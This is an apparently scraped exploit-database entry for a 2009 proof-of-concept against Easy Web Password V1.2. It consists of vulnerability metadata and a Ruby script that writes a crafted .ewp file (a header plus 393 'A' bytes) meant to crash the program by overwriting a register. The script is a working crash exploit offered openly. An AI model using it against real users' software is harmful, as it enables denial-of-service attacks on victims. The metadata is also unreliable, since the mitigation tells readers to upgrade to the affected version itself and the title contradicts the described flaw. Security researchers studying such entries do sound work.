Easy Web Password V1.2 Local Heap Memory Consumption Proof of Concept

vendor:

Easy Web Password

by:

milw0rm.com

7.8

CVSS

HIGH

Heap Memory Consumption

119

CWE

Product Name: Easy Web Password

Affected Version From: V1.2

Affected Version To: V1.2

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2009

Easy Web Password V1.2 Local Heap Memory Consumption Proof of Concept

A vulnerability in Easy Web Password V1.2 allows an attacker to cause a denial of service (DoS) condition by overwriting the EDX register with 0x41414141. This can be exploited by an attacker to cause a denial of service condition by sending a specially crafted .ewp file to the victim.

Mitigation:

Upgrade to the latest version of Easy Web Password V1.2

Source

Exploit-DB raw data:

#!/usr/bin/env ruby
# Easy Web Password V1.2 Local Heap Memory Consumption Proof of concept
# http://www.efssoft.com/ewpsetup.exe
# Register
# EAX 00000000
# ECX 04A43C58
# EDX 41414141  ( EDX overwrited )
# EBX 00000001
# ESP 0012A4E0
# EBP 0012F140
# ESI 0012A720
# EDI 2FDE5000
# EIP 00405AB4 EasyWebP.00405AB4
time3 = Time.new
puts "Exploit Started in Current Time :" + time3.inspect
puts "Enter Name For your File Like : Stack"
moad = gets.chomp.capitalize
puts "Name Of File : " + moad +'.html'
time1 = Time.new
$VERBOSE=nil
Header =   "\x4D\x79\x44\x42\x2C\x43\x6F\x70\x79\x72\x69"+
           "\x67\x68\x74\x5F\x47\x75\x48\x6F\x6E\x67"
    
Bof    =  "\x41" * 393
   
crash =  Header + Bof
 
File.open( moad+".ewp", "w" ) do |the_file|
the_file.puts(crash)
puts "Exploit finished in Current Time :" + time1.inspect
puts "Now Open " + moad +".ewp :d"
end

# milw0rm.com [2009-03-04]